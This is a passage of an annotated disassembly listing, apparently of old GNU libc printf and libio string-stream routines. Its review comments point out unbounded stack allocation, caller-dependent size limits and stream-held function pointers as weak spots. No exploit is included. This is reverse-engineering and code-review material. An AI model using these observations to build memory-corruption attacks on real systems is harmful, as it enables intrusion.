byte ptr [esi] mov eax, [ebx+14h] cmp [ebx+18h], eax ja short loc_8052C34 movzx eax, dl push eax push ebx call sub_8061910 add esp, 8 jmp short loc_8052C3F ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 db 8Dh, 36h ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 loc_8052C34: ; CODE XREF: sub_80529CC+255j mov eax, [ebx+14h] mov [eax], dl movzx eax, dl inc dword ptr [ebx+14h] loc_8052C3F: ; CODE XREF: sub_80529CC+264j cmp eax, 0FFFFFFFFh jz short loc_8052C84 inc edi loc_8052C45: ; CODE XREF: sub_80529CC+247j inc esi lea eax, [ebp+var_1] cmp esi, eax jbe short loc_8052C18 loc_8052C4D: ; CODE XREF: sub_80529CC+1DFj mov ecx, [ebp+arg_4] cmp byte ptr [ecx+8], 0 jz short loc_8052C8D movzx edx, byte ptr [ecx+8] mov eax, [ebx+14h] cmp [ebx+18h], eax ja short loc_8052C74 movzx eax, dl push eax push ebx call sub_8061910 cmp eax, 0FFFFFFFFh jz short loc_8052C84 jmp short loc_8052C8C ; 陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳 align 4 loc_8052C74: ; CODE XREF: sub_80529CC+294j mov eax, [ebx+14h] mov [eax], dl movzx eax, dl inc dword ptr [ebx+14h] cmp eax, 
0FFFFFFFFh ; operand of the `cmp eax,` that closes the previous listing line
        jnz short loc_8052C8C

loc_8052C84: ; CODE XREF: sub_80529CC+27j
        ; sub_80529CC+59j ...
        ; Shared failure exit of sub_80529CC (the routine begins earlier in
        ; the listing): eax = -1.
        mov eax, 0FFFFFFFFh
        jmp short loc_8052C8F
; ---------------------------------------------------------------------------
        align 4

loc_8052C8C: ; CODE XREF: sub_80529CC+2A5j
        ; sub_80529CC+2B6j
        inc edi ; count the byte just emitted

loc_8052C8D: ; CODE XREF: sub_80529CC+288j
        mov eax, edi ; success: return the running count kept in edi

loc_8052C8F: ; CODE XREF: sub_80529CC+2BDj
        lea esp, [ebp+var_410]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
sub_80529CC endp

; =============== S U B R O U T I N E =======================================
;
; sub_8052C9C -- rewrite a run of bytes backwards, inserting a separator byte
; between groups. Called from vfprintf. The control flow matches the digit
; grouping helper of GNU printf (group_number); NOTE(review): that name is
; inferred from structure only, confirm with library signatures.
;
; Arguments (pushed right to left):
;   arg_0  pointer just below the first source byte (the copy starts at arg_0+1)
;   arg_4  pointer to the last byte; the backward rewrite starts here
;   arg_8  byte string of group sizes; a 0FFh byte stops grouping, a 0 byte
;          makes the previous size repeat
;   arg_C  separator byte stored between groups
; Returns: eax = final destination cursor (esi); arg_0 is returned unchanged
;          when the first group-size byte is 0FFh.
;
; Review notes:
;   * The scratch copy is carved out of the stack: (arg_4 - arg_0), rounded up
;     to a multiple of 4, is subtracted from esp. No upper bound is checked in
;     this routine.
;   * Every inserted separator moves the output one byte further down, so the
;     rewritten run can begin at or below arg_0. The headroom has to be
;     provided by the caller.
;
; Attributes: bp-based frame hidden

sub_8052C9C proc near ; CODE XREF: vfprintf+DDFp
        ; vfprintf+F4Ap ...

var_18 = byte ptr -18h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h

        push ebp
        mov ebp, esp
        sub esp, 0Ch
        push edi
        push esi
        push ebx
        mov esi, [ebp+arg_0]
        mov edi, [ebp+arg_8] ; edi walks the group-size string
        cmp byte ptr [edi], 0FFh
        jz loc_8052D85 ; first size is 0FFh: nothing to do
        movzx edx, byte ptr [edi]
        mov [ebp+var_4], edx ; var_4 = bytes left in the current group
        mov ebx, [ebp+arg_4]
        sub ebx, esi ; ebx = arg_4 - arg_0 = number of bytes to regroup
        mov eax, ebx
        add eax, 3
        and al, 0FCh ; round up to a multiple of 4
        sub esp, eax ; stack scratch buffer (no bound check, see notes)
        mov [ebp+var_8], esp ; var_8 = start of the scratch copy
        lea eax, [esi+1]
        push ebx
        push eax
        mov edx, [ebp+var_8]
        push edx
        call memcpy ; memcpy(scratch, arg_0 + 1, count)
        mov edx, [ebp+var_8]
        lea ecx, [edx+ebx-1] ; ecx = last byte of the scratch copy (read cursor)
        mov esi, [ebp+arg_4] ; esi = write cursor, starts at arg_4
        cmp ecx, edx
        jb loc_8052D85 ; empty run
        nop

loc_8052CEC: ; CODE XREF: sub_8052C9C+E3j
        mov al, [ecx]
        mov [esi], al ; copy one byte, both cursors move down
        dec ecx
        dec esi
        dec [ebp+var_4]
        jnz loc_8052D7C ; group not complete yet
        cmp [ebp+var_8], ecx
        ja loc_8052D85 ; group complete but no bytes left: no trailing separator
        mov al, [ebp+arg_C]
        mov [esi], al ; emit the separator
        dec esi
        movzx ebx, byte ptr [edi]
        mov [ebp+var_4], ebx ; reload the counter from the current size byte
        inc edi
        cmp byte ptr [edi], 0
        jnz short loc_8052D1C
        dec edi ; next size is the 0 terminator: keep using this one
        jmp short loc_8052D7C
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; ---------------------------------------------------------------------------

loc_8052D1C: ; CODE XREF: sub_8052C9C+78j
        cmp byte ptr [edi], 0FFh
        jnz short loc_8052D7C
        ; Next size is 0FFh: copy everything that is left without separators.
        ; The copy is unrolled four times; the compares below pick the entry
        ; point from the remaining count modulo 4.
        mov edx, [ebp+var_8]
        dec edx
        mov eax, edx
        sub eax, ecx
        and eax, 3
        cmp ecx, edx
        jle short loc_8052D4A
        test eax, eax
        jz short loc_8052D58
        cmp eax, 3
        jge short loc_8052D4A
        cmp eax, 2
        jge short loc_8052D44
        mov al, [ecx]
        mov [esi], al
        dec ecx
        dec esi

loc_8052D44: ; CODE XREF: sub_8052C9C+A0j
        mov al, [ecx]
        mov [esi], al
        dec ecx
        dec esi

loc_8052D4A: ; CODE XREF: sub_8052C9C+92j
        ; sub_8052C9C+9Bj
        mov al, [ecx]
        mov [esi], al
        dec ecx
        dec esi
        cmp [ebp+var_8], ecx
        ja short loc_8052D85
        db 8Dh,76h,0 ; lea esi, [esi+0]

loc_8052D58: ; CODE XREF: sub_8052C9C+96j
        ; sub_8052C9C+DBj
        mov al, [ecx]
        mov [esi], al
        mov al, [ecx-1]
        mov [esi-1], al
        mov al, [ecx-2]
        mov [esi-2], al
        mov al, [ecx-3]
        mov [esi-3], al
        add ecx, 0FFFFFFFCh ; ecx -= 4
        add esi, 0FFFFFFFCh ; esi -= 4
        cmp [ebp+var_8], ecx
        jbe short loc_8052D58
        jmp short loc_8052D85
; ---------------------------------------------------------------------------
        align 4

loc_8052D7C: ; CODE XREF: sub_8052C9C+59j
        ; sub_8052C9C+7Bj ...
        cmp [ebp+var_8], ecx
        jbe loc_8052CEC ; loop while the read cursor is inside the scratch copy

loc_8052D85: ; CODE XREF: sub_8052C9C+12j
        ; sub_8052C9C+49j ...
        mov eax, esi ; return the write cursor
        lea esp, [ebp+var_18] ; drops the stack scratch buffer as well
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
sub_8052C9C endp

; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0

; =============== S U B R O U T I N E =======================================
;
; sub_8052D94 -- "buffer full" handler of a helper stream that forwards its
; bytes to another stream. No caller is listed, so it is presumably reached
; through a function-pointer table. Shape matches libio's helper overflow
; routine used by buffered printf -- TODO confirm.
;
;   arg_0  helper stream object; fields used here:
;            +10h start of pending bytes, +14h write cursor, +18h write limit,
;            +54h pointer to the stream that receives the bytes
;          (offsets are consistent with GNU libio's FILE layout -- assumption)
;   arg_4  byte to store
; Returns: eax = the byte, zero-extended, on the in-buffer path; otherwise
;          whatever sub_8061910 returns.
;
; Attributes: bp-based frame hidden

sub_8052D94 proc near

var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch

        push ebp
        mov ebp, esp
        push esi
        push ebx
        mov ebx, [ebp+arg_0]
        mov esi, [ebx+54h] ; esi = target stream
        mov edx, [ebx+14h]
        sub edx, [ebx+10h] ; edx = number of pending bytes
        jz short loc_8052DBB
        mov eax, [esi+50h] ; function table of the target stream
        push edx
        mov edx, [ebx+10h]
        push edx
        push esi
        mov eax, [eax+34h]
        call eax ; indirect: table slot +34h (target, pending data, length)
        sub [ebx+14h], eax ; pull the write cursor back by the count reported
        add esp, 0Ch

loc_8052DBB: ; CODE XREF: sub_8052D94+11j
        mov edx, [ebx+14h]
        cmp [ebx+18h], edx
        jbe short loc_8052DD4 ; still no room: take the slow path
        mov al, [ebp+arg_4]
        mov [edx], al
        and eax, 0FFh
        inc dword ptr [ebx+14h]
        jmp short loc_8052DDF
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------

loc_8052DD4: ; CODE XREF: sub_8052D94+2Dj
        movzx eax, [ebp+arg_4]
        push eax
        push ebx
        call sub_8061910 ; (stream, byte); presumably the generic overflow entry -- confirm

loc_8052DDF: ; CODE XREF: sub_8052D94+3Cj
        lea esp, [ebp+var_8]
        pop ebx
        pop esi
        mov esp, ebp
        pop ebp
        retn
sub_8052D94 endp

; =============== S U B R O U T I N E =======================================
;
; sub_8052DE8 -- run vfprintf into a 400h-byte stack buffer through a
; temporary stream object, then hand the buffered bytes to the real stream in
; one call. Called from vfprintf+4Fh. Shape matches GNU libc's
; buffered_vfprintf -- TODO confirm.
;
;   arg_0  destination stream
;   arg_4, arg_8  forwarded to vfprintf unchanged (presumably the format
;          string and the argument list)
; Returns: the value vfprintf returned, or -1 when the flush call reports a
;          count different from the number of buffered bytes.
;
; Temporary stream built in place at var_458 (field = var_458 + offset):
;   +0   var_458 = 0FBAD0004h   flags word (in libio 0FBAD0000h is the magic
;                               value; the low bits are flags -- assumption)
;   +10h var_448 = &var_400     start of pending bytes
;   +14h var_444 = &var_400     write cursor
;   +18h var_440 = ebp          write limit = var_400 + 400h
;   +50h var_408 = offset aN6+2 function table; IDA shows it relative to a
;                               string label, presumably a mis-typed data item
;   +54h var_404 = arg_0        stream that finally receives the bytes
;
; Review note: the only thing that keeps writes inside var_400 is the limit in
; var_440 together with the overflow handler of the temporary stream.
;
; Attributes: bp-based frame hidden

sub_8052DE8 proc near ; CODE XREF: vfprintf+4Fp

var_464 = byte ptr -464h
var_458 = dword ptr -458h
var_448 = dword ptr -448h
var_444 = dword ptr -444h
var_440 = dword ptr -440h
var_408 = dword ptr -408h
var_404 = dword ptr -404h
var_400 = byte ptr -400h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h

        push ebp
        mov ebp, esp
        sub esp, 458h
        push edi
        push esi
        push ebx
        mov esi, [ebp+arg_0]
        mov ebx, [ebp+arg_4]
        mov edx, [ebp+arg_8]
        lea ecx, [ebp+var_458] ; ecx = temporary stream
        mov [ebp+var_404], esi
        lea eax, [ebp+var_400]
        mov [ebp+var_448], eax
        mov [ebp+var_444], eax
        mov [ebp+var_440], ebp
        mov [ebp+var_458], 0FBAD0004h
        mov [ebp+var_408], (offset aN6+2)
        push edx
        push ebx
        push ecx
        call vfprintf ; vfprintf(temporary stream, arg_4, arg_8)
        mov edi, eax ; keep its result for the return value
        mov ebx, [ebp+var_444]
        sub ebx, [ebp+var_448] ; ebx = bytes left in the stack buffer
        add esp, 0Ch
        test ebx, ebx
        jle short loc_8052E70
        mov eax, [esi+50h] ; function table of the real stream
        push ebx
        mov edx, [ebp+var_448]
        push edx
        push esi
        mov eax, [eax+34h]
        call eax ; indirect: table slot +34h (stream, data, length)
        cmp eax, ebx
        jz short loc_8052E70
        mov eax, 0FFFFFFFFh ; short write: report failure
        jmp short loc_8052E72
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------

loc_8052E70: ; CODE XREF: sub_8052DE8+68j
        ; sub_8052DE8+7Dj
        mov eax, edi

loc_8052E72: ; CODE XREF: sub_8052DE8+84j
        lea esp, [ebp+var_464]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
sub_8052DE8 endp

; ---------------------------------------------------------------------------
        align 4

; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden

sub_8052E80 proc near ; CODE XREF: sub_804F820+26p
        ; sub_8052F34+12p ...
; Body of sub_8052E80 (its `proc near` line closes the previous listing line).
;
; sub_8052E80 -- attach a caller-supplied memory area to a stream object so
; that reads and writes operate on that memory. Shape matches libio's
; _IO_str_init_static -- TODO confirm with library signatures.
;
;   arg_0  stream object
;   arg_4  start of the memory area
;   arg_8  size: 0 means "use the length of the NUL-terminated string at
;          arg_4"; a negative value means "no size given" (see note)
;   arg_C  optional initial write position inside the area, or 0
;
; Stream fields touched in this group of routines (offsets are consistent with
; GNU libio's FILE layout -- assumption, confirm against the libc 5.3.12 headers):
;   +0 flags, +4 read cursor, +8 read limit, +0Ch read base,
;   +10h write base, +14h write cursor, +18h write limit,
;   +1Ch buffer start, +20h buffer end, +50h function table,
;   +54h high-water length, +58h allocate callback, +5Ch free callback
;
; NOTE(review): for a negative arg_8 the size is chosen only from address
; arithmetic (the largest doubling of 400h, up to 4000000h, for which
; arg_4 + size does not wrap). The resulting limit is unrelated to the real
; size of the memory at arg_4, so any bound has to come from the caller.

var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h

        push ebp
        mov ebp, esp
        sub esp, 4
        push edi
        push esi
        push ebx
        mov esi, [ebp+arg_4] ; esi = start of the area
        mov ebx, [ebp+arg_8] ; ebx = size
        test ebx, ebx
        jnz short loc_8052EA8
        ; size == 0: inline strlen of the area
        xor al, al
        mov edi, esi
        cld
        mov ecx, 0FFFFFFFFh
        repne scasb
        mov eax, ecx
        not eax
        lea ebx, [eax-1] ; ebx = string length
        jmp short loc_8052ED3
; ---------------------------------------------------------------------------

loc_8052EA8: ; CODE XREF: sub_8052E80+11j
        test ebx, ebx
        jge short loc_8052ED3 ; positive size: use it as given
        ; negative size: probe for the largest usable power-of-two size
        mov edx, 400h
        lea eax, [esi+400h]
        cmp eax, esi
        jbe short loc_8052ED1 ; even 400h would wrap the address
        nop

loc_8052EBC: ; CODE XREF: sub_8052E80+4Fj
        cmp edx, 3FFFFFFh
        jg short loc_8052ED1
        add edx, edx ; double the candidate size
        test edx, edx
        jle short loc_8052ED1
        lea eax, [edx+esi]
        cmp eax, esi
        ja short loc_8052EBC ; keep doubling while start + size does not wrap

loc_8052ED1: ; CODE XREF: sub_8052E80+39j
        ; sub_8052E80+42j ...
        mov ebx, edx

loc_8052ED3: ; CODE XREF: sub_8052E80+26j
        ; sub_8052E80+2Aj
        push 0
        lea ecx, [ebx+esi]
        mov [ebp+var_4], ecx ; var_4 = end of the area
        push ecx
        push esi
        mov edi, [ebp+arg_0]
        push edi
        call sub_8061B6C ; (stream, start, end, 0); presumably sets +1Ch/+20h -- confirm
        mov [edi+10h], esi
        mov [edi+0Ch], esi
        mov [edi+4], esi
        cmp [ebp+arg_C], 0
        jz short loc_8052F0C
        ; initial write position given: writable from arg_C to the end,
        ; readable up to arg_C
        mov ecx, [ebp+arg_C]
        mov [edi+14h], ecx
        mov ecx, [ebp+var_4]
        mov [edi+18h], ecx
        mov ecx, [ebp+arg_C]
        mov [edi+8], ecx
        jmp short loc_8052F1A
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; ---------------------------------------------------------------------------

loc_8052F0C: ; CODE XREF: sub_8052E80+73j
        ; no write position: write window is empty, whole area is readable
        mov edi, [ebp+arg_0]
        mov [edi+14h], esi
        mov [edi+18h], esi
        add esi, ebx
        mov [edi+8], esi

loc_8052F1A: ; CODE XREF: sub_8052E80+87j
        mov ecx, [ebp+arg_0]
        mov [ecx+54h], ebx ; remember the size
        mov dword ptr [ecx+58h], 0 ; no allocate callback: the area cannot grow
        lea esp, [ebp+var_10]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
sub_8052E80 endp

; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0

; =============== S U B R O U T I N E =======================================
;
; sub_8052F34 -- same set-up as sub_8052E80 with arg_C = 0, then sets flag
; bit 8 in the stream's flags byte. The routines below treat bit 8 as
; "writing not allowed". Presumably libio's _IO_str_init_readonly -- confirm.
;
;   arg_0 stream object, arg_4 memory area, arg_8 size (as for sub_8052E80)
;
; Attributes: bp-based frame hidden

sub_8052F34 proc near

var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h

        push ebp
        mov ebp, esp
        push ebx
        mov ebx, [ebp+arg_0]
        mov edx, [ebp+arg_4]
        mov eax, [ebp+arg_8]
        push 0
        push eax
        push edx
        push ebx
        call sub_8052E80
        or byte ptr [ebx], 8
        mov ebx, [ebp+var_4]
        mov esp, ebp
        pop ebp
        retn
sub_8052F34 endp

; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0

; =============== S U B R O U T I N E =======================================
;
; sub_8052F58 -- store one byte into a memory-backed stream, growing the
; buffer when it is full. No caller is listed, so it is presumably reached
; through a function-pointer table. Shape matches libio's _IO_str_overflow --
; TODO confirm.
;
;   arg_0  stream object
;   arg_4  byte to store, or -1 for "make room only"
; Returns: arg_4 on success (0 when arg_4 is -1 and flag bit 8 is set),
;          -1 on failure.
;
; Review notes:
;   * Growth doubles the current size (+20h minus +1Ch). A zero-length buffer
;     therefore requests zero bytes, and the doubling itself is not checked
;     for wrap-around in this routine.
;   * Allocation and release go through pointers stored in the stream object
;     (+58h, +5Ch), so the integrity of that object decides which code runs.
;   * Streams with flag bit 1 set are never grown: the call fails instead.
;
; Attributes: bp-based frame hidden

sub_8052F58 proc near

var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch

        push ebp
        mov ebp, esp
        sub esp, 0Ch
        push edi
        push esi
        push ebx
        mov ebx, [ebp+arg_0]
        cmp [ebp+arg_4], 0FFFFFFFFh
        setz al
        and eax, 0FFh
        mov [ebp+var_4], eax ; var_4 = 1 when arg_4 is -1, else 0
        mov ecx, [ebx+14h]
        sub ecx, [ebx+10h]
        mov [ebp+var_8], ecx ; var_8 = write offset
        mov ecx, [ebx+4]
        sub ecx, [ebx+0Ch]
        mov [ebp+var_C], ecx ; var_C = read offset
        test byte ptr [ebx], 8
        jz short loc_8052FA0
        ; flag bit 8 set: succeed only for the "make room" request
        xor eax, eax
        cmp [ebp+var_4], 0
        jnz loc_805306C

loc_8052F96: ; CODE XREF: sub_8052F58+84j
        ; sub_8052F58+9Bj
        mov eax, 0FFFFFFFFh
        jmp loc_805306C
; ---------------------------------------------------------------------------

loc_8052FA0: ; CODE XREF: sub_8052F58+30j
        mov ecx, [ebp+var_8]
        cmp [ebx+54h], ecx
        jnb short loc_8052FAB
        mov [ebx+54h], ecx ; raise the high-water length to the write offset

loc_8052FAB: ; CODE XREF: sub_8052F58+4Ej
        mov eax, [ebx]
        and eax, 0C00h
        cmp eax, 400h
        jnz short loc_8052FCB
        ; bit 400h set and bit 800h clear: set 800h, continue writing at the
        ; read offset and use the high-water length as the new read offset
        ; (presumably the switch from reading to writing -- confirm)
        mov ecx, [ebp+var_C]
        mov [ebp+var_8], ecx
        or dword ptr [ebx], 800h
        mov ecx, [ebx+54h]
        mov [ebp+var_C], ecx

loc_8052FCB: ; CODE XREF: sub_8052F58+5Fj
        mov eax, [ebx+20h]
        sub eax, [ebx+1Ch] ; eax = current buffer size
        add eax, [ebp+var_4]
        cmp [ebp+var_8], eax
        jb short loc_8053037 ; still room: no growth needed
        test byte ptr [ebx], 1
        jnz short loc_8052F96 ; flag bit 1: buffer must not be replaced
        mov edi, [ebx+20h]
        sub edi, [ebx+1Ch]
        add edi, edi ; edi = new size = 2 * old size
        push edi
        mov eax, [ebx+58h]
        call eax ; indirect: allocate callback (new size)
        mov esi, eax ; esi = new buffer
        add esp, 4
        test esi, esi
        jz short loc_8052F96 ; allocation failed
        mov edx, [ebx+1Ch]
        mov eax, [ebx+20h]
        sub eax, edx
        push eax
        push edx
        push esi
        call memcpy ; memcpy(new buffer, old buffer, old size)
        add esp, 0Ch
        cmp dword ptr [ebx+1Ch], 0
        jz short loc_8053021
        mov eax, [ebx+1Ch]
        push eax
        mov eax, [ebx+5Ch]
        call eax ; indirect: free callback (old buffer)
        mov dword ptr [ebx+1Ch], 0 ; clear the stale pointer right away
        add esp, 4

loc_8053021: ; CODE XREF: sub_8052F58+B4j
        push 1
        lea eax, [edi+esi]
        push eax
        push esi
        push ebx
        call sub_8061B6C ; (stream, new start, new end, 1); presumably sets +1Ch/+20h -- confirm
        mov [ebx+10h], esi
        mov eax, [ebx+20h]
        mov [ebx+18h], eax

loc_8053037: ; CODE XREF: sub_8052F58+7Fj
        ; rebuild the cursors relative to the (possibly new) buffer start
        mov ecx, [ebp+var_8]
        add ecx, [ebx+1Ch]
        mov [ebx+14h], ecx
        mov eax, [ebx+1Ch]
        mov [ebx+0Ch], eax
        mov ecx, [ebp+var_C]
        add ecx, [ebx+1Ch]
        mov [ebx+4], ecx
        mov ecx, [ebx+1Ch]
        add ecx, [ebx+54h]
        mov [ebx+8], ecx
        cmp [ebp+var_4], 0
        jnz short loc_8053069 ; "make room only": nothing to store
        mov eax, [ebx+14h]
        mov cl, byte ptr [ebp+arg_4]
        mov [eax], cl
        inc dword ptr [ebx+14h]

loc_8053069: ; CODE XREF: sub_8052F58+104j
        mov eax, [ebp+arg_4]

loc_805306C: ; CODE XREF: sub_8052F58+38j
        ; sub_8052F58+43j
        lea esp, [ebp+var_18]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
sub_8052F58 endp

; ---------------------------------------------------------------------------
        db 8Dh, 36h

; =============== S U B R O U T I N E =======================================
;
; sub_8053078 -- return the next readable byte of a memory-backed stream
; without advancing the read cursor. Shape matches libio's _IO_str_underflow
; -- TODO confirm.
;
;   arg_0  stream object
; Returns: the byte at the read cursor, zero-extended, or -1 when the read
;          cursor has reached the read limit.
;
; Attributes: bp-based frame hidden

sub_8053078 proc near

arg_0 = dword ptr 8

        push ebp
        mov ebp, esp
        mov edx, [ebp+arg_0]
        mov eax, [edx+14h]
        sub eax, [edx+10h]
        cmp [edx+54h], eax
        jnb short loc_805308C
        mov [edx+54h], eax ; raise the high-water length to the write offset

loc_805308C: ; CODE XREF: sub_8053078+Fj
        mov eax, [edx]
        and eax, 0C00h
        cmp eax, 0C00h
        jnz short loc_80530A6
        ; bits 400h and 800h both set: clear 800h and close the write window
        and dword ptr [edx], 0FFFFF7FFh
        mov eax, [edx+18h]
        mov [edx+14h], eax

loc_80530A6: ; CODE XREF: sub_8053078+20j
        mov ecx, [edx+0Ch]
        add ecx, [edx+54h]
        mov [edx+8], ecx ; read limit = read base + high-water length
        mov eax, [edx+4]
        cmp eax, ecx
        jb short loc_80530C0
        mov eax, 0FFFFFFFFh ; nothing left to read
        mov esp, ebp
        pop ebp
        retn
; ---------------------------------------------------------------------------
        align 4

loc_80530C0: ; CODE XREF: sub_8053078+3Cj
        mov eax, [edx+4]
        movzx eax, byte ptr [eax]
        mov esp, ebp
        pop ebp
        retn
sub_8053078 endp

; ---------------------------------------------------------------------------
        db 8Dh, 36h

; =============== S U B R O U T I N E =======================================
;
; sub_80530CC -- return the current content length of a memory-backed stream:
; the larger (unsigned) of the write offset (+14h minus +10h) and the stored
; high-water length (+54h). Presumably libio's _IO_str_count -- confirm.
;
;   arg_0  stream object
;
; Attributes: bp-based frame hidden

sub_80530CC proc near ; CODE XREF: sub_80530E4+10p

arg_0 = dword ptr 8

        push ebp
        mov ebp, esp
        mov edx, [ebp+arg_0]
        mov eax, [edx+14h]
        sub eax, [edx+10h]
        cmp [edx+54h], eax
        jbe short loc_80530E0
        mov eax, [edx+54h]

loc_80530E0: ; CODE XREF: sub_80530CC+Fj
        mov esp, ebp
        pop ebp
        retn
sub_80530CC endp

; =============== S U B R O U T I N E =======================================
;
; sub_80530E4 -- reposition the read and/or write cursor of a memory-backed
; stream. Shape matches libio's _IO_str_seekoff -- TODO confirm.
;
;   arg_0  stream object
;   arg_4  offset
;   arg_8  origin: 1 = relative to the current cursor, 2 = relative to the
;          content length, any other value = absolute
;   arg_C  bit 1 = move the read cursor, bit 2 = move the write cursor
; Returns: the resulting offset, or -1 when it is negative or beyond the
;          content length (also -1 when neither bit of arg_C is set).
;
; NOTE(review): the offset is adjusted in place in ebx. With both bits of
; arg_C set and a relative origin, the write branch starts from the value
; already adjusted by the read branch.
;
; Attributes: bp-based frame hidden

sub_80530E4 proc near

var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h

        push ebp
        mov ebp, esp
        push edi
        push esi
        push ebx
        mov esi, [ebp+arg_0]
        mov ebx, [ebp+arg_4] ; ebx = offset
        mov edi, [ebp+arg_8] ; edi = origin
        push esi
        call sub_80530CC
        mov edx, eax ; edx = content length
        mov eax, 0FFFFFFFFh ; default result
        mov ecx, [ebp+arg_C]
        test cl, 1
        jz short loc_805313A
        ; --- read cursor ---
        cmp edi, 1
        jz short loc_8053118
        cmp edi, 2
        jnz short loc_8053120
        add ebx, edx ; origin 2: relative to the content length
        jmp short loc_8053120
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------

loc_8053118: ; CODE XREF: sub_80530E4+27j
        mov eax, [esi+4]
        sub eax, [esi+0Ch]
        add ebx, eax ; origin 1: relative to the read offset

loc_8053120: ; CODE XREF: sub_80530E4+2Cj
        ; sub_80530E4+30j
        test ebx, ebx
        jl short loc_8053160 ; negative result
        cmp ebx, edx
        ja short loc_8053160 ; beyond the content
        mov ecx, [esi+0Ch]
        add ecx, ebx
        mov [esi+4], ecx
        mov ecx, [esi+0Ch]
        add ecx, edx
        mov [esi+8], ecx
        mov eax, ebx

loc_805313A: ; CODE XREF: sub_80530E4+22j
        mov ecx, [ebp+arg_C]
        test cl, 2
        jz short loc_8053175
        ; --- write cursor ---
        cmp edi, 1
        jz short loc_8053150
        cmp edi, 2
        jnz short loc_8053158
        add ebx, edx
        jmp short loc_8053158
; ---------------------------------------------------------------------------

loc_8053150: ; CODE XREF: sub_80530E4+61j
        mov eax, [esi+14h]
        sub eax, [esi+10h]
        add ebx, eax ; origin 1: relative to the write offset

loc_8053158: ; CODE XREF: sub_80530E4+66j
        ; sub_80530E4+6Aj
        test ebx, ebx
        jl short loc_8053160
        cmp ebx, edx
        jbe short loc_8053168

loc_8053160: ; CODE XREF: sub_80530E4+3Ej
        ; sub_80530E4+42j ...
; Tail of sub_80530E4; the label loc_8053160 sits on the previous listing line.
; This is the out-of-range exit: the requested offset was negative or larger
; than the content length.
        mov eax, 0FFFFFFFFh
        jmp short loc_8053175
; ---------------------------------------------------------------------------
        align 4

loc_8053168: ; CODE XREF: sub_80530E4+7Aj
        mov [esi+54h], edx ; store the content length computed by sub_80530CC
        mov ecx, [esi+10h]
        add ecx, ebx
        mov [esi+14h], ecx ; write cursor = write base + offset
        mov eax, ebx

loc_8053175: ; CODE XREF: sub_80530E4+5Cj
        ; sub_80530E4+81j
        lea esp, [ebp+var_C]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
sub_80530E4 endp

; ---------------------------------------------------------------------------
        align 4

; =============== S U B R O U T I N E =======================================
;
; sub_8053180 -- refuse to push a byte back into a stream that has flag bit 8
; set, otherwise defer to sub_80623B8. Presumably libio's _IO_str_pbackfail --
; TODO confirm.
;
;   arg_0  stream object (only the flags byte at +0 is read here)
;   arg_4  byte to push back, or -1
; Returns: -1 when bit 8 is set and arg_4 is not -1; otherwise the result of
;          sub_80623B8(arg_0, arg_4).
;
; Attributes: bp-based frame hidden

sub_8053180 proc near

arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch

        push ebp
        mov ebp, esp
        mov edx, [ebp+arg_0]
        mov eax, [ebp+arg_4]
        test byte ptr [edx], 8
        jz short loc_805319C
        cmp eax, 0FFFFFFFFh
        jz short loc_805319C
        mov eax, 0FFFFFFFFh
        mov esp, ebp
        pop ebp
        retn
; ---------------------------------------------------------------------------

loc_805319C: ; CODE XREF: sub_8053180+Cj
        ; sub_8053180+11j
        push eax
        push edx
        call sub_80623B8 ; presumably the generic push-back routine -- confirm
        mov esp, ebp ; also discards the two pushed arguments
        pop ebp
        retn
sub_8053180 endp

; ---------------------------------------------------------------------------
        align 4

; =============== S U B R O U T I N E =======================================
;
; sub_80531A8 -- release the buffer of a memory-backed stream and run the
; common clean-up in sub_8061FC0. Presumably libio's _IO_str_finish -- TODO
; confirm.
;
;   arg_0  stream object
;
; The buffer at +1Ch is passed to the callback stored at +5Ch only when the
; pointer is non-null and flag bit 1 is clear. The pointer is then zeroed in
; every case before sub_8061FC0 runs, so that routine never sees the old
; buffer address.
;
; Attributes: bp-based frame hidden

sub_80531A8 proc near

var_4 = dword ptr -4
arg_0 = dword ptr 8

        push ebp
        mov ebp, esp
        push ebx
        mov ebx, [ebp+arg_0]
        cmp dword ptr [ebx+1Ch], 0
        jz short loc_80531C6
        test byte ptr [ebx], 1
        jnz short loc_80531C6 ; flag bit 1: buffer is not released here
        mov eax, [ebx+1Ch]
        push eax
        mov eax, [ebx+5Ch]
        call eax ; indirect: free callback stored in the stream object
